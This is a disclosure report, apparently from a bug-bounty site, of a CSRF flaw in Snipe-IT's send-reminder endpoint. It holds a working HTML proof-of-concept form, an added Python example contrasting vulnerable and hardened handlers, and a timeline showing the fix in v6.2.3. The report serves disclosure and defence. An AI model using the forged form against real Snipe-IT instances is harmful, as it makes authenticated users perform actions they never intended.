CSRF in Send Reminder in snipe/snipe-it


Reported on

Oct 7th 2023


CSRF in Send Reminder

Proof of Concept

1. The attacker sends the victim a page containing a fake form:

     <!-- no method attribute: the browser submits a GET, which this endpoint accepts as a state change -->
     <form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
       <input type="submit" value="Submit request" />
     </form>
     <script>
       history.pushState('', '', '/');
     </script>

2. The victim clicks the button and the send-reminder action executes without their intent.

Video PoC



Impact: an attacker can trick authenticated users into performing unwanted actions (here, sending an unaccepted-asset reminder) on their behalf.
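The PoC works because the reminder endpoint changes state on a plain GET and never checks who authored the request. The following is an added example (not Snipe-IT's own code; Snipe-IT is a Laravel application, where moving such a route from GET to POST puts it under the framework's VerifyCsrfToken middleware, which only inspects POST/PUT/PATCH/DELETE). It models a minimal request object and shows the vulnerable handler next to a hardened one that applies the three usual checks: POST only, a synchronizer token bound to the session, and Origin/Referer agreement with the site. The `Request` type, the `_token` field name, and the attacker origin are assumptions made for the example.

```python
"""Added example: CSRF defences for a state-changing endpoint such as
/reports/unaccepted_assets/{id}/sent_reminder. Not the project's own code."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Origin taken from the report's PoC URL.
SITE_ORIGIN = "https://demo.snipeitapp.com"
REMINDER_PATH = "/reports/unaccepted_assets/4/sent_reminder"


@dataclass
class Request:  # hypothetical minimal request model
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: stored server-side in the session and echoed by the real form."""
    token = secrets.token_urlsafe(32)
    session["_token"] = token
    return token


def origin_allowed(request: Request) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is this site."""
    origin = request.headers.get("Origin")
    if origin is None:
        referer = request.headers.get("Referer")
        if referer is None:
            return False  # no provenance at all: treat as cross-site
        p = urlparse(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == SITE_ORIGIN


def send_reminder_vulnerable(request: Request) -> tuple[int, str]:
    """Behaviour the report describes: any method, no token, no origin check."""
    return 200, "reminder sent"


def send_reminder(request: Request) -> tuple[int, str]:
    """Hardened handler: POST only, valid session token, same-origin provenance."""
    if request.method != "POST":
        return 405, "state-changing action requires POST"
    expected = request.session.get("_token", "")
    supplied = request.form.get("_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 419, "CSRF token mismatch"  # Laravel uses 419 for this case
    if not origin_allowed(request):
        return 403, "cross-origin request rejected"
    # A real implementation would queue the reminder e-mail here.
    return 200, "reminder sent"


def poc_request() -> Request:
    """Constructed replay of the PoC: a cross-site form with no method attribute,
    so the browser sends a GET with no token while the session cookie rides along."""
    session = {}
    issue_csrf_token(session)
    return Request("GET", REMINDER_PATH,
                   headers={"Origin": "https://attacker.example"},  # constructed
                   session=session)


def forged_post_request() -> Request:
    """Constructed variant: the attacker page submits a POST instead, still tokenless."""
    r = poc_request()
    r.method = "POST"
    return r


def legitimate_request() -> Request:
    """Constructed request from the site's own form, which embeds the session token."""
    session = {}
    token = issue_csrf_token(session)
    return Request("POST", REMINDER_PATH,
                   headers={"Origin": SITE_ORIGIN},
                   form={"_token": token}, session=session)


if __name__ == "__main__":
    for name, req in [("PoC GET", poc_request()),
                      ("forged POST", forged_post_request()),
                      ("legitimate", legitimate_request())]:
        print(name, "vulnerable:", send_reminder_vulnerable(req), "hardened:", send_reminder(req))
```

The method check alone already defeats the form in the report, since a form without a `method` attribute can only produce a GET; the token and origin checks are what stop the obvious follow-up of changing the form to `method="POST"`.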

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 5 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 5 months ago
snipe validated this vulnerability 5 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
snipe marked this as fixed in v.6.2.3 with commit 6d55d7 5 months ago
snipe has been awarded the fix bounty 5 months ago


oke, thank you.

This vulnerability has now been published 4 months ago